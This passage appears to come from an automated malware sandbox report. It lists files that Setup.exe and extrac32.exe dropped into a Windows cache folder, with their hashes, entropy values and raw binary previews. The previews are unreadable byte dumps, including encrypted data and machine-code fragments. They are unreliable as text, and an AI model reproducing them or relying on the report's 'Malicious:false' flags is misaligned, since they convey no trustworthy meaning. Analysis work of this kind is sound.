                                                                                                                                                                                                                                                              Preview:..~.D..j.N.a......WE>.J...m...ar.I.Dv...-.....a./p.ax...=8.1J/0X.j.3.=.....N..A...}...D...t]..l....|.B.W.j..e#pY5...m..4.-......_.Mo....Y.8(...(..E.......Nr.....WZ....IlB....BG.F-.V...#.h...%(........nT...+....c.?>L.,...I.J/..y..*.l.S.X'.."@.'.o.Q.....=.."..D^...?...&.B...5...g...+.K.!Wv..T+.PbA .Y..B....9]GpO%~...3.0n..j...<..~........9.U..W3...> ..N.~.%.....f..)..q4M.....$.d,. ..d......U......$.....s....Q...7..1Z.3..q.O.......,+mA..r....F..&.tb~......q.}...8.U..).X,#o..B< .X.{.M3..Vi.......^.Wa.0...%KX)...1......>.....-p.95..Gv8....]B.[...1..b.d..S.g7..:..`..y.(...s+.j........r...N...B....x...W....H..z..n.....!pW.A._U<.....bDp.W8.{,:....c.C.P]o.i+..l._.{....DH|..F.l.F<..D....+...T.."..U..fDW.Lp'd?.^......u...;....nD......c..Q..1N....^-<,.01S.ZAg..Y.vD.....f...T.r2..P`;.l.\..Y....b4...}......K..Z(.*.....!z>Hg......C...U7&#..:_..mn.9'*.."@T.1G...5.X....w.&)]P...v.".."6>......}._...13-.t.a_...18i..)..E..i.X.....)p..Y..KME3.$.....J.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Desktop

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                                                                                                              Entropy (8bit):7.996465240604242
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:mqWV4m6Lf8uDp5z4KySdFW0r8aGhx29a1u+wes5CcC:m3Otf8uDpekWoE29ads1C
                                                                                                                                                                                                                                                              MD5:CF5C8A28E5CB0E61ED033C3EA6EFAA7E
                                                                                                                                                                                                                                                              SHA1:95A5CE7B3CA88E5C8A2483AF9585B467AAC325DC
                                                                                                                                                                                                                                                              SHA-256:E7DAB9A1EF6FEF6EAF979908F89F879D1951F7941BAC2C5DEFA85B71BC28BA42
                                                                                                                                                                                                                                                              SHA-512:4CAB47F1CCE607018F3D4F97232C3442F7EB4786813ED008020237D6189101953363EFB1F29A9A36C0304DA834118A828E3BA623DB01DA94588268A2E1D0D8D6
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.cQ.........F.e.....V.\........+.y.-....P.x4..[.0.}..I.....F.*..=t..W."1..%.....k....5...b..p...*.lM...}=.<./`......F.I<..m.*.J.u. .5.g..{.....g.FW6j=...G.g>.."..e...jK.*.p..].y.q..N...Z.r.).*.Y{....Nz.q..N.s.'.-.....c......i~yNI8`F..._.u...m3...g.[...6.w.Z.n.l......]. H...Q.nB..<.X.R..XBm......;....H.)..P.v..+b...s.R....3......J9.S`.5.....P]9...F.5..-,.8I.w*g.7.O..{U?GP.v.....a.7...b.6(......Y.t.......mv.7..W..`....,..4.............Us.OT...GX..e..F?..X..W..@..v,3..`D<X)Y..|C......E?/.......#.E...4..bm[ZR..H......;a. ......#.yw.~..j...0|..t...F.J.8E.T.\F....R.]n.B.....j...B.Y.qW5dR..Z....[vO.UYz.2.....a........`...).#j..l....C.$.y.8....A@...'....t..,.V>T..N-...b.F5..4 .WdD.....5....o.3&...)^L....E.CU.N{.i..^q2.AX.m[..O...O.h.O.3...n..<.B.Z..uu..5....:L.nH..Uufh....:.]..G.....$.g5.T...GD...Hb...5.lp.rp...Z.e..%.m....P.....D....'c.3y..U..... ..6 .....\..!...K.q..H.K.sZs......z..-$..O..?.o!...b.W..H..-~.$....`....p..jb.UP./m...=.og.q.l;N;.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Enable

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):48040
                                                                                                                                                                                                                                                              Entropy (8bit):7.051639397887468
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:39BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:39BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                                                                                                                                                                              MD5:E10C4F74C953CF485827811AD726D7F7
                                                                                                                                                                                                                                                              SHA1:229733B8F94265DAB942D47A476FEC3DC5A0B4D6
                                                                                                                                                                                                                                                              SHA-256:E1242E544F51F0B3C5FBA0E4364325D07F9DAFD69A8CA2BDFF95BC9FA441938D
                                                                                                                                                                                                                                                              SHA-512:D3EC1E2B52CD58ED890D84005ADFF287FD0FF8FAD96981800FE4E0AEC4B9DBEB42E20BA2D550C34C3CCC6682F57188DA8537F03A36D453D73FBDB5C0563B3F23
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:............................................................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...................................%.................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...................%.........................g...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...f.........................................]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...].......................W..............f...]......................`.........................................................]...e................W.................]...]...`......................d...................................................f...]...].................................]...]...]...p...................~...{...............................................]...]...]..................................]...]...]...]......................e...y.............

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Frank

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:Targa image data 16 x 16 x 16 +16 +16 "\020"
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):120832
                                                                                                                                                                                                                                                              Entropy (8bit):5.691312775542772
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:ZHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:ZLeAg0Fuz08XvBNbjaAtsPR
                                                                                                                                                                                                                                                              MD5:A99199AEC5BC87A1EE2F8C545403FC99
                                                                                                                                                                                                                                                              SHA1:96F6AF78FC4A1B3E7584D08CE6B37A509436BF4A
                                                                                                                                                                                                                                                              SHA-256:CB14578B039ED3E7474AF41D30AD0802E0CB2D14083E455742783B3AC0D40C1D
                                                                                                                                                                                                                                                              SHA-512:33858F6C9FE204AE42D4FC5062B80520234429C9B77481F7ED113E0065161D38BB89B68B3B03D7DA488465A24194BFB3C57AE2653F4F6B41DC7FCD46D06B6D72
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:H............................................................................................................................................................................................. ................................................................................................................................................................................................................................................................................................................................................................................................................................. !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................................................................................................................................................................................. !"#$%&'

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Gather

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):71680
                                                                                                                                                                                                                                                              Entropy (8bit):7.996985850796443
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:Dzj2jmVu8VWhTmuXGP89dqjaExQjdDx0P/r1bdOTKwaqup:DuCVXSdIj8jw3JbEGoup
                                                                                                                                                                                                                                                              MD5:19A1CB04B353C4311062EBA6B3698DCA
                                                                                                                                                                                                                                                              SHA1:FA193375E64A1F0943C0C6101B4855CBA6AEBB06
                                                                                                                                                                                                                                                              SHA-256:794D207C1EF7E7496C18F1537CDD905C8770BA74DD37899E0E5D57E5BC263A02
                                                                                                                                                                                                                                                              SHA-512:8E2B94340B194CB80A85DB4289E008A45A42887627D9D729B87D3A3D14D286D41941EFEBCDC9CDB510BD757BD2988F51FCC302EB9786E87AED7C7E275A23A275
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:...~.......dL.1hhE..v.....$IM.\...+J......&..%.2}~65..........d.c.c`.Ld....m&j.....'..M.....L..=.h..1...L.[.X....<..N.f4M....D0).'.5......I%:.6$Q....Y>.0..p.N.*..0......y..@....C.k0D.._..}*4.z.....R..._.......>ES.o.Gr.W=v.f.@Ds....N.q.0i....=.56..;......z....$.o.7.)...........C[j...hn.{N..i....N.1..,....V.U..h3....@...TC....C..kB=w..}..&e.....b......k...@Z*......|...Q~i[[.LB.&...<..dM.<.....3..XK....-:.*6.p4...W.)D.........>.>..9...!.q.9.]...S....c..Zp.u..Z.gl.y.v...x.tI9....|cA..[...5.LM..A ../.%W.. .} ......IH....M.+.q....."V.oW....|;.KW....S7Bv..+.46t.....J...M.......Ce.@O......+.W....b.l.!..A.Bl9CX...c.MP:.j.W..|.k.F.r7C.Y.Fp.t.>.uf....m.8."...U.I.....om~..a.!..MU.>.]4.....7...Gs~AI.A?j.......0o0..l...$.@5lH.....{.j.*I+........0..x.5...4....(u...B....:......|.`.E.....k...}....`....E.N,A......fs..h..L.2..y...............b....;.....w.....2V.YK7.J....VZ];..e.....%.@*....h........L...3....>Qn.^..I&d...'7....7...F1...../&t..q.N-.a..ak.:..nE.U~.qu

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Intend

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):75776
                                                                                                                                                                                                                                                              Entropy (8bit):7.9977125434845275
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:Aqmc6FxQCbt62Wp/PKh7v1HWKL+VO1myp73iAyd9qzMZVvqX9X8Y:Aqmc6Uc827vsKqw1myp73iAW9qIMt8Y
                                                                                                                                                                                                                                                              MD5:22CD791ACE0898DD41C34F268CE1BD58
                                                                                                                                                                                                                                                              SHA1:8172A0BD78195B0771FCF47591F5C69A1D684038
                                                                                                                                                                                                                                                              SHA-256:E581D98106E4489D2EEE549ADA60B286C8EB16734EA6AFC85460CE7ED5EF8FA6
                                                                                                                                                                                                                                                              SHA-512:9542E2E8023CD5E6146E40215F016029A7E0996860D269284F615BD02CC491FE40FECE9D06B4F0B43B958E6104AF03BECBBF1AB4E17AE349D89EA7DA7129CB89
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:....I.......%.],......`.fuo..-m.e;&6..j..n!.~l.....t.e-......#..&.....9v..>.lkG..!...M.$b.....-Y..../.",YH.j0.WQ|.G:.....<[.8.... ..^..7[.n.o1O..C........S...y;*.8(.{i_.e.W...~.(.....I...r.B....SN..q.".s...e`.il.#...q..]W.z....l.-6...%.Q....."a..8c....\.......]N.:md.............Z...-.'..5j.?|''.Hy..:AU.h...z.&=....6./....*.7.'...D9{Yq" .."..+7./...W..sZ.....S...#..bx.....Ib..[3.0....'9G..e....._k.<....j.m.+..I%m.....MN...p.p...L...z.S.........*...8*_z~/.W..b..?.6.....G.....\...{.?T.w\..f..-.$.C~.......cC...M.iV.0...Z......S.=.M...'5~ir....!i.....GM....#...%/.H.....g...X...>_f&3|o.K'....Yo..G`....FO.u..t.l%..].........T...K.... 1Q......F....N.G....q....D}C..K.:'.....p..u.Y.j.BbJ.....u..gk.....e.uYi,...m..}#.i.Cq..e..(7)......?.n..4...r.`(z_....Bl/0..sx|.b..%.P..V.g......Vz..n_UJ...8....DYl.4.+1....".......[..<.8.S.rA.[...e6.P.t}~...c7..?.....KIV.L....L9....._....FxJ......I......~..8P..I.b.n..a.....m..rMy0.`^..(.....+.\..G.P.!..5.1...

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Laboratories

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):98304
                                                                                                                                                                                                                                                              Entropy (8bit):7.998082220994016
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:3iGJ6CzDBObnA3TTcG8xdJO4xamCEKgRAY1k1NhF6m0SilB08n7fgw5l55BC4H7b:3PzMbETTcGiJOgafElJ1k1L3hSC8rgMV
                                                                                                                                                                                                                                                              MD5:AE3D975D673229D2DA6CEC3AF9EE9732
                                                                                                                                                                                                                                                              SHA1:797E8261FA697D3FC874D26DA185F257B3B81D5E
                                                                                                                                                                                                                                                              SHA-256:68CEF50D6B6FA0AB188BC868F09322A76815473B3CAB69870DF192C82C88A39A
                                                                                                                                                                                                                                                              SHA-512:08790808E0825EFBAD01C8C2943FA76C740D869DE6B7C565964C732154311D0A17E1E6F16FA12F7C2BD68323D2D9D78A3756C1E0FA6078F4296EABD5D0835AF5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:#.VB.R..!m.....8.....d+....5.[.Yqf1...A...M.......zO....b..dl.%n...~..^.t.........&..AU.h.z.U..g...B.v.`?.x.ja8.;.F.~.z.H.@3..O.:.P..l.8i...7.7Y0Z..1.9..{...#tI....}................<'W..J......~.D............;iz..[\yQ...b..`ea.(...B...t.M.ji...~j6W........?..iH..g.....U.oYB{.%.....$c\../.P.m...b.....U.T.......V.....c.+.`.J..v../...y=d4.9X.,.).Q.x<>+.N.(.:4Z.J..n+..Mk.-L.5.B.UdR!(....er...}...........?/L.....Z&._s....$G..........HO.].vD..\?Z\t...Q..9.s...S_..J.P.....L!..}k...*;.q....*s.Y.ZQ. ./#.M....B.f,...9...K..9.Y..;l"4P.....EV.D..IqWa.d....8..|....+\...Ah.P$.X...s....!'(...!)L......5.4......bMI...pL7...^"*+...A.9.{.N.w.!|.....X...I)........#.....B...*H..,e...wV....u.K.!.P.v."L5n.%. z ...<zcoAs.mB*..S..X3(.~f.o..<....|g.....V..6.s]..[o...o..F.B..`.)..............Ncq.XP..u...Y.ySe.j...)....L....+.6....t....54%.H...j.....B.b..L.JJ.!...'!L...............6...I..M.....G......L.<.s{.x&.,o....>.....lia\.^.....d..K[V(..P....J`...#,.........T[W...

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leonard

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):45255
                                                                                                                                                                                                                                                              Entropy (8bit):7.996544831946577
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:768:PWDnoTjWWU3IPi3NVha+rq/uoa+eMJIzwOXd9VZByhI2raIV60OgJCgDNtTlbjA6:+SjWWiv9Vy27VzHHVoIBhgsQNjbK0
                                                                                                                                                                                                                                                              MD5:443721AB42DC4D5D15C8787F5A514E32
                                                                                                                                                                                                                                                              SHA1:97170DCA5C3F4424CA91713659934C2B172E440A
                                                                                                                                                                                                                                                              SHA-256:B8A42699C79C3217332DEBDBFA10C68756B768AD0BAD985CBE8B11C108D4EC58
                                                                                                                                                                                                                                                              SHA-512:87B31354964E9E6178D75D0C1B25C99CE422DEA783172FB971D4D69482D14DB6FFDFBA01E2C014228B9509CCF9D82B0E8A5B85FA542C2A800EF1A2AF864B63B3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:b.g....V=....Qi.8..g.N..H.i..8...T.Bd...~..Qn...#..6.#.]...r/6.....R+h...>P.....'w..urn..rEOc......rR..;/V...?..C..)ep.zG]..8w.".!...L..ch...K"6..*.....&.p......:..i..o.-.q...<..(\....H.BzO.y@..eN.p~2U..}....e.A..hn.E...'.....[.i..S.L].....B.2A.2.S.....+.Z;.1....q......6$..._\>4...?...XhT.]..SF.6..N.B&.......x..%.`.;... .o.....I.....m..M....`i...$.+..y...%. ;gHU..en.-...............KW.7\...-I...ZZ.xU......~.....X..J"+5$.UVW.??....Q8.*(..&.3...-.O..L.P....$0..,..b..!1F.vb.d..N../....>F...Z..+...E...6...m{.... .g=.)kRo.y:.a+.z..3...ue...~..WLt.O.IP..<...\5Yz..G..X./........#.S%...A8.J*=Z.h...!I.Z.A....RT....h...(.@.[UOq .,...2..O..E...(NC2h.!.?.j|.(qu....I.........Q.._WH#.."..K...3.mp.Y..oP{v...<..2..;....../.h...B...4...A.Q5."2..H.T9C....O\0.....9....v....).-:6....R..N!........a..._..TI0:...w{.gNE. ....m.yDg...uK...IQ..U..*......y.:..X.P...|.9Ea.^)cr.......U.."..*f.!.=r.~v..~,..;.......g.j!N..O_..?.......GGy.}f:...JQ...j...n.`...c..#sRo....2..

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Makes

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                              Entropy (8bit):3.6847605455787105
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:12:TyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmvH:TyGS9PvCA433C+sCNC1skNkvQfhSH
                                                                                                                                                                                                                                                              MD5:BB88411A60DDC0157E8D40D1ED76CD79
                                                                                                                                                                                                                                                              SHA1:117982A5D6D309FB2854CE6C0640D29B75033538
                                                                                                                                                                                                                                                              SHA-256:2A2D98124D316800FE418BA09B228259080EE85D66BEAA46DEE67FEDF597620D
                                                                                                                                                                                                                                                              SHA-512:0A83AAE0CD0E5A793292B39A95E9232A2ACFF82E59A5DC294CBC4C5822BC302F61C463A7083A0B47EDE6DF74B3F1C9B021B1BFC3F514B08E36A20A67A6F6426E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:makes........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Prefix

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):142336
                                                                                                                                                                                                                                                              Entropy (8bit):6.7126978121624745
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:o/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7td:o/sZ7HS3zcNPj0nEo3tb2jv
                                                                                                                                                                                                                                                              MD5:5042A594DA710E47600836FBC43D6AD4
                                                                                                                                                                                                                                                              SHA1:2DA77CA2E0B3688213130CDF716D15D708571F0B
                                                                                                                                                                                                                                                              SHA-256:169E9B982A79E12CCD7946B4BAEE1F4C87C820F404379BE690F01320C3D536E2
                                                                                                                                                                                                                                                              SHA-512:45D9E37D873AA17D6227F25A74908BD90716D5AC0C4AC636EE595C83750BF0631D1C154368BAB8931A875031600C440F68185C06365DE1212C7A612B3866FA57
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:..C....C.E.9.................E.@P....u.V....1L...C..u....u...K.M.................C.................M.......;.......Q.........................S..E...@P.u.V.u..u...........u....}..#.E..S.@P.u.VQ.u..M...........M...............=....E........E........................E........E........E...............u..~|.............;~|.......7....E.;.|....h.E..u..VQ.M...........x..U.G.M...B.U.;}.|..0...u(.......t..F|;.....v..Fh.............?....U..}.;...C....E...M.@P.u.V.u..u...........A....E..U....B.U.;.s.........u..F|...E..............;F|......;......a....E...M.@P.u.V.u..u..........}................E.9E........M.;N|..............M.%....=....u.............%...............M.......v...n..M....................M.....0....M..E....E.@P.u.V.u..u..k..........]....&............E.9E........E.;F|..H..........E.......v...n.......................M..........E...M.@.E.P.u.V.u..u..........t.....E...}.@P.u...V.u..u..................E.9E...S...;~|.............U..t*..%....=....u.............%.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Re

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):152576
                                                                                                                                                                                                                                                              Entropy (8bit):6.5828820443058795
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:eT6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/J:SAUkB0CThp6vmVnjphfhnvO5bLezWWtB
                                                                                                                                                                                                                                                              MD5:837BF147B892CCED11D8599CE6DA2354
                                                                                                                                                                                                                                                              SHA1:C69307105A9A7888C39E351DF7B32BA1018F9C5F
                                                                                                                                                                                                                                                              SHA-256:9D93B4F03094FE65B6505E8245BAA7C9BBA085F7D81CAE74E6C98E4047CFD183
                                                                                                                                                                                                                                                              SHA-512:8AC87391D1862A17179BAD2DD75B169D30C2FEB796E05DD34819368CF3D5EEF42F4CB392AEAF910BC6580177D511B11376348AE5087BA473463CC36C2A81522C
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:........_^[.U..Q.e..V.....t=.~..t7.}..t1.}..t+j..E.P.u..u..v.....I...u.9F.t..v...`.I..f...E.^....U..I ..t.].....}..t..M.h..I...Z..3.]..........$..U..I ..t.]......M.h..I..Z..3.]...SV..W.F.P.F.P.~.W.^.S......u.WSj.j........_^[.U....SV..W.=h.I.h.....s8.}.V..C........u.Q....Y......C.Q.K.....Yj..C..E.Ph.....s..s0....I..........}.........s.V..h.I..C..M...9C.sL.C..E..{..E..E.y.....L..]..E....CL......P.C..-....s..C.W.s..3...W.!....M.....C..C.Q.s.P......E.....C.V..\.I.j..E.Ph.....s..s0....I.....T....}..s8.{..t..s.......c..Y.....SV.._^..[..U..M...t............]...U..QV..3.9N4u..E.PQVh..G.QQ..h.I..F4^..W....4.tcS._8.3S..h.I.=....tNV.w.V..h.I.h.....w4..l.I.h.....w4..l.I...4.t..w4..`.I..g4.h....S..h.I.V..\.I.^[_.SVW..3.C.. .u2...t.....t.....2...t..w.j<....YV.........G .+.....$.u6...t.....u.2..t%...u .w.j<.e...YV........G$.._^[....._^[.U..VW.}.....G...f.F.f.G.f.F..l.....t$j........Y.....J..H..J..H..J..H.... f...u......G..F...f.. u..........._..^]............t.....t.Q.-....U..VW.}...;.t

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Sons

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):58368
                                                                                                                                                                                                                                                              Entropy (8bit):6.5922539876659005
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:nq0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu5:q0Imbi80PtCZEMnVIPPBxU
                                                                                                                                                                                                                                                              MD5:8E17BE931CE1809DA31A0F6D0B6D2E0D
                                                                                                                                                                                                                                                              SHA1:FACBF2933A2A37418FE111B1C52BD7E544814DD7
                                                                                                                                                                                                                                                              SHA-256:FCE2D1465A77CA597699578BF600BF962FC85DC09BDB68577BCE432D9B20E5B3
                                                                                                                                                                                                                                                              SHA-512:2CB8BCAC36BDE735BDF4D92DC813A749F1123A3DC44CFD3153C20F8C7E32F560FDD26D24761DBE15C0C2436A818CF1A42D427615206CD0BE5397EC9322DF2878
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:u.....#u......Y..Y.u..e..=4.M..|'.}...].S.t....u.....#u..e...Y..Y.u...U._^[..]..U..Q.P.L....u..\....P.L....u........j..M.Qj..M.QP....I...t.f.E...]..U....t.M.SV.u......S.4:..j..F...+...~...F.YYt.j@Y....^............F..F......F..F..f....^[]..U..M.3.8.t.;E.t.@.<..u.]..S..QQ......U.k..l$..........L.3.E..C.V.s.W.....|........t)...t ...t....t....t....urj...j...j...j...j._Q.F.PW.f.......uG.K....t....t....t..e.....E..F.......]..E..F.P.F.PQW..|...P.E.P.=h.......|...h....Q..m...>.YYt.."$....t.V.E$..Y..u..6..k..Y.M._3.^.;.....]..[..U..QQ.E....]..E...]..U...M.V..uG9E.u..R..........Z(........>.}..t.....9u.v..+..........3(......^].|...j..u..u..u.........^]..U.....}........SVW.u..M..I...}........t..]...t..M.;.v..............'...N.E......u.QSW...........3+......M.QP......M.....QP........C.m..t...t.;.t.+..}..t..M...P...._..^[..3...].j.h(.L.....3..u........u..)...j.^.0.2'.....g...3.9E......t.}..t..E.%...........t.3..E..E.E..u..u..u..u..u.V.E.P.c.........}..E............t.......L.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Symbol

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):122880
                                                                                                                                                                                                                                                              Entropy (8bit):6.332790394280177
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:yZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDj:yK5vPeDkjGgQaE/loUDj
                                                                                                                                                                                                                                                              MD5:3BFDFC2C0298A9F87E726D34816A69CB
                                                                                                                                                                                                                                                              SHA1:3AA28889544312273E065763D5C84A44BD57CC6F
                                                                                                                                                                                                                                                              SHA-256:0A1AE6C240382136944F010A708AE95DF886A135FA46A08A269228B5C0D942BD
                                                                                                                                                                                                                                                              SHA-512:D72803247318BF39744BAEC8C5D1B4F6C6B2B8B5E7D94EA059A05457FFBFA18041AE6ACD02681A1C35FFBFA9305F44E15F12688084F2A1ACFDA3C48FB5142073
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Thousand

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, 489455 bytes, 10 files, at 0x2c +A "Frank" +A "Re", ID 5566, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):489455
                                                                                                                                                                                                                                                              Entropy (8bit):7.99858200434768
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:12288:TsroZ9yhYo53qf9MWr2RKSGwIs/eOOgguCb8tb9MedVP0WOjVHh5uj:TkoZ9Y3qf9MWrJwF/eOOghR4e3baxaj
                                                                                                                                                                                                                                                              MD5:B46FB35146A48B73DFD677FE6DE292A3
                                                                                                                                                                                                                                                              SHA1:0F5A70314A77DF29C9838B9A523F76FD84C352C1
                                                                                                                                                                                                                                                              SHA-256:088F9C381AFD7B2F220F8D7435B46ED382602BB4C29BB5009C448C8CCCF8B111
